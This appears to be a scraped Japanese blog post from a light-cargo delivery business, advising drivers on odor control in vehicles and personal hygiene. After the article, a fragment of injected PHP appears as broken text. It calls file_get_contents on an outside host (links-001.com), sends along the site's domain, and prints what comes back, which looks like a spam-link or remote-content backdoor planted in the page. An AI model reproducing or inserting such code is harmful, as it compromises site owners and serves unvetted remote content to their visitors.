前へ
次へ

軽貨物での運送の際に必要となる臭い対策

軽貨物の運送を行う際に発生するクレームの1つとして臭いがあります。軽貨物にて運送された荷物がタバコ臭いといったクレームや変な臭いがついているといったクレームが来ることが珍しくありません。タバコに関する臭いのクレームは多いようで、実際軽貨物の求人でタバコに関する規定のある職場もありますし、軽貨物のマッチングサイトなどの依頼によっては荷物に臭いがつくことを嫌がりあらかじめ禁煙を依頼されることもあります。特に軽貨物の運送業者の場合はトラックのように荷物と運転席の間に隔たりがないため、臭いがつきやすくなります。ですから軽貨物の運送中に車内でタバコを吸うのはやめておきましょう。また窓を開け閉めすると砂ぼこりなどが入ってきますし、車内で休憩中に飲食をした際に気が付かないうちに食べ物などをこぼしていることもあります。こういった臭いも荷物に染み付くことがありますし、荷物に汚れのつく原因ともなります。ですから月に1回など定期的に掃除を行う、換気を行うといった臭い対策をすることが大切です。また夏の汗はシートなどにしみ込みやすく、放置すると車内に不快な臭いがたまる原因ともなります。ですから消臭剤をシートに使用したりするなど消臭対策を積極的に行うようにしましょう。また車内の消臭対策も必要ですが、軽貨物の運送業者にて働くドライバーも臭い対策を行うことが大切です。特に夏など汗をかきやすい季節の場合軽貨物の運送が忙しくて汗対策を行わないと不快では済まないほど汗臭くなっている場合があります。いくら自分が軽貨物の運送を依頼したとはいえ、そんな不潔な人が来たとなれば今後仕事の依頼がなくなる可能性が高いでしょう。そういった臭いで仕事を失わないためにも夏の暑い時期はお客様に会う前に制汗シートを使用する、着替えを定期的に行うといった臭い対策を積極的に行うようにしましょう。また夏以外の季節でも自分の臭いを定期的にチェックし、汗やたばこなど少しでも相手に不快な思いをさせそうな臭いがする場合は消臭スプレーをかけてから行くなど徹底した臭い対策を行うのがおすすめです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top